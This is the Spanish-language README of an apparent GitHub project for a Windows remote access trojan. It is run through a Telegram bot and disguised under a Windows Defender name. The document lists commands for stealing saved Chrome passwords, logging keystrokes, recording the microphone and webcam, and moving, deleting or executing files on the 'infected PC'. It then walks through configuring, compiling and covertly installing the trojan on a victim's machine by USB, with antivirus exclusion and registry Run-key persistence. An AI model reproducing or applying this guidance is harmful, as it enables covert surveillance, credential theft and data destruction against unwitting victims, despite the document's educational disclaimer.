/RAT_via_Telegram_Windows

Troyano de acceso remoto para Windows via servidor de Telegram, controla y una una maquina infectada mediante un bot de Telegram - Python3

Primary LanguagePythonMIT LicenseMIT

  ╔═══╦═══╦════╗        ╔════╗ ╔╗                ╔╗╔╗╔╗     ╔╗
  ║╔═╗║╔═╗║╔╗╔╗║        ║╔╗╔╗║ ║║                ║║║║║║     ║║
  ║╚═╝║║ ║╠╝║║╚╝╔╗╔╦╦══╗╚╝║║╠╩═╣║╔══╦══╦═╦══╦╗╔╗ ║║║║║╠╦═╗╔═╝╠══╦╗╔╗╔╦══╗
  ║╔╗╔╣╚═╝║ ║║  ║╚╝╠╣╔╗║  ║║║║═╣║║║═╣╔╗║╔╣╔╗║╚╝║ ║╚╝╚╝╠╣╔╗╣╔╗║╔╗║╚╝╚╝║══╣
  ║║║╚╣╔═╗║ ║║  ╚╗╔╣║╔╗║  ║║║║═╣╚╣║═╣╚╝║║║╔╗║║║║ ╚╗╔╗╔╣║║║║╚╝║╚╝╠╗╔╗╔╬══║
  ╚╝╚═╩╝ ╚╝ ╚╝   ╚╝╚╩╝╚╝  ╚╝╚══╩═╩══╩═╗╠╝╚╝╚╩╩╩╝  ╚╝╚╝╚╩╝╚╩══╩══╝╚╝╚╝╚══╝
                                    ╔═╝║                 
                                    ╚══╝                   v 1.1.0

Made with Python

Nota: Éste proyecto tiene como finalidad el aprendizaje de ciberseguridad y hacking, no me hago responsable de un posible mal uso de ésta herramienta.

Read this documentation in English

Información Importante

  • Fecha de documentación : 09/05/2020
  • Versión: v1.1.0
  • Peso compilado: 45MB aproximadamente
  • Versión Python: 3.7 (Obligatoriamente debe ser ésta versión)
  • Licencia: MIT licence

Archivos del repositorio - Github

Archivos

  • Doc = Contiene la documentación en ingles
  • Compilar.bat = Convierte el archivo *.py a *.exe
  • Ejecutar.bat = Ejecuta el RAT en consola, se muestra una consola.
  • iconDefender.ico = Icono Windows Defender
  • LICENCE = Licencia
  • proxy.py = librería *.py , no mover ni modificar
  • README.md= Ésta Documentación
  • StartUp.reg = [Modifica el Registro de Windows] <== En la versión 1.1.0 se eliminó éste archivo ya que ahora este archivo viene incluido dentro del código
  • versionN.txt = Información detalla de conversión *.py a *.exe
  • WindowsDefenderAdvanced.py = Código fuente del RAT via Telegram Windows

Requerimientos de espacio de trabajo

Nota: Si usted desea puede descargar el entorno virtual de python 3.7 con todas las librerías instaladas y usadas en éste proyecto aquí

Librerías utilizadas

  • import winshell
  • import tendo
  • import winreg <== Permite modificar el registro de Windows
  • import pypiwin32
  • import pyinstaller <= Compila el proyecto
  • import psutil
  • import pillow
  • import opencv-python
  • import sys
  • import threading <= Permite ejecución multihilos
  • import datetime
  • import argparse
  • import logging
  • import socket <== Verifica conexión a internet
  • import select

Funcionalidades

/apagar

Apaga la computadora de la [PC Infectada]

/audio

Graba desde el microfono de la [PC Infectada]

Ejemplo:

/audio [Tiempo en segundos]
/audio 45

/captura

Toma una captura de pantalla - [PC Infectada]

/ir

Navega entre carpetas - [PC Infectada]

Ejemplo:

/ir [Ruta entre comillas dobles y debe terminar con un "\"]

/ir "D:\SoftwarePortable\Android Studio\"

/listar

Muestra la lista de archivos que se encuentran en una carpeta - [PC Infectada]

Ejemplo:

/listar [Ruta entre comillas dobles y debe terminar con un "\"]

/listar "D:\SoftwarePortable\Android Studio\plugins\"

/cmd_dns

Muestra la información desde la DNS - [PC Infectada]

/copiar

Copia un archivo de una carpeta a otra - [PC Infectada]

Ejemplo:

/copiar [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]

/copiar  "C:\Users\Anonymous\Documents\virus.exe"   "C:\Users\Anonymous\Desktop\virus.exe"

/descargar

Descarga un archivo - [PC Infectada]

Ejemplo:

/descargar [Ruta entre comillas dobles y debe terminar con la extensión del archivo]

/descargar "O:\OneDrive - xKx\Pictures\Developer Software\Website\logo.png"

/ejecutar

Ejecuta un EXE - [PC Infectada]

Ejemplo:

/ejecutar [Ruta entre comillas dobles y debe terminar con la extensión del archivo]

/ejecutar "C:\Users\Public\virus.exe"

/eliminar

Elimina un archivo o carpeta - [PC Infectada]

Ejemplo:

/eliminar [Ruta entre comillas dobles y debe terminar con un "\" o con la extensión del archivo]

/eliminar "D:\Photos\FotosFamilia\"
/eliminar "D:\Photos\FotosFamilia\03122019.jpg"

/enviar

Envía archivos de nuestra PC o celular a la [PC Infectada]

Ejemplo:

/enviar [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]

/enviar  "C:\Users\Anonymous\Documents\virus.exe"   "C:\Users\Victima\Documents\NoEsvirus.exe"

/fondo

Cambia fondo de pantalla - [PC Infectada]

Ejemplo:

/fondo   C:/Users/User/Desktop/porn.jpg

/get_chrome

Obtiene las contraseñas guardadas en Chrome - [PC Infectada]

/get_key

Obtiene el registro de teclas - [PC Infectada]

/ip_info

Obtiene la información desde la IP [PC Infectada]

/mover

Mueve archivos - [PC Infectada]

Ejemplo:

/mover [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]

/mover  "C:\Users\Anonymous\Documents\virus.exe"   "C:\Users\Anonymous\Desktop\virus.exe"

/proxy

Abre un puerto localhost:8081 - [PC Infectada] No recomentable ya que, windows mandará un mensaje de FireWall, por ahora no se recomienda.

/red_info

Muestra información de la red- [PC Infectada]

/reiniciar

Reinicia la computadora - [PC Infectada]

/tareas

Muestra información de procesos - [PC Infectada]

dsf

/test

Verifica si la [PC Infectada] se encuentra en linea

/this

Muestra la ruta donde se encuentra el RAT

/web

Abre un URL en el navegador predeterminado de Ejemplo:

/web   https://www.youtube.com/watch?v=ywGOLN0dDKU
/web   https://www.xxx.com

/webcam

Graba o toma foto de la webcam

NOTA: No probado, tampoco sé si la luz de la webCam se enciende.



Futuras caracteristicas

Se está trabajando en las siguientes caracteristicas y se iran habilitando en las siguientes actualizaciones futuras actualizaciones

Preparación

Nota: Si usted desea puede descargar el entorno virtual de python 3.7 con todas las librerías instaladas y usadas en éste proyecto aquí

  • Editar el archivo WindowsDefenderAdvanced.py

    Archivo Windows defender advances troyano

  • Creamos en BotFather un Bot

    botFather

  • Obtenemos nuetro token

  • Entramos y agregamos nuestro token del bot

    agregar

  • lo que sigue despues es obtener el ID de nuestro chat, pero para eso necesitamos ua ejecutar nuestro RAT.

  • Para ejecutarlo, busque el archivo Ejecutar.bat => Y le damos a editar.

    Ejecutar.bat

  • He insertamos la ruta donde se encuentra nuestro RAT

    ejecutar.bat data

  • Una vez terminado ya podemos ejecutar nuestro RAT y en la consola se verá algo así.

  • Y en nuestro telegram tenemos que mandar un comando, para recibir nuestro ID del chat

  • Y en nuestra consola aparecerá nuestro ID del chat

    chat id

  • Ahora con el ID único que obtuvimos, tenemos que escribirlo dentro del archivo WindowsDefenderAdvanced.py

  • Y listo, ahora nuestro RAT solo responderá a nuestro ID privado, nadie más podrá tener ese acceso. ya está listo para compilar.

Conversión de *.py a *.exe:

  • Busque el archivo Compilar.bat

    Compilar.bat

  • => Clic derecho => Editar

    Compilar.bat código

Y colocamos la ruta de la carpeta donde se encuentra el RAT

  • => Guardamos => Ejecutamos para compilar...

  • Listo, el RAT se compiló exitosamente.

Método de infección:

¿Cómo infecto a la victima?

  • El archivo compilado es el siguiente

    Final files

Nota: No cambiar de nombre al archivo WindowsDefenderAdvanced.exe, si usted le cambia el nombre, el RAT quedará obsoleto.

  • Usten guardará el archivo en un USB.
  • Conectará el USB a la [PC] a infectar.
  • Se recomienda desactivar el antivirus o agregar una exclusión en al siguiente ruta: "C:\Users\Public\Security\Windows Defender".
  • Lo siguiente es ejecutar el archivo WindowsDefenderAdvanced.exe en el USB, el RAT se replicará en la siguiente ruta "C:\Users\Public\Security\Windows Defender", Se recomienda no sacar el USB al instante ya que el RAT se estará replicando en la ruta.

NOTA: Al ejecutar el archivó, ésta automaticamente modificará el registro de windows para que se inicie siempre al prender la computadora.

El RAT tratará de modificar la siguiente ruta del registro "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" por lo cual necesitará permisos de administrador, por ende se recomienda que la primera ejecución se realice con permisos de administrador, en caso de que no lo ejecute con permisos de administrador, el RAT modificará la siguiente ruta "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

Explicación:

  • HKEY_LOCAL_MACHINE: El RAT se ejecutará en todos los usuarios exitentes y los nuevos usuarios de la computadora
  • HKEY_CURRENT_USER: El RAT solo se ejecutará en el usuario actual, si se llegará a crear otro usuario, el RAT Solo funcionará en el usuario principal


Creador

By SebastianEPH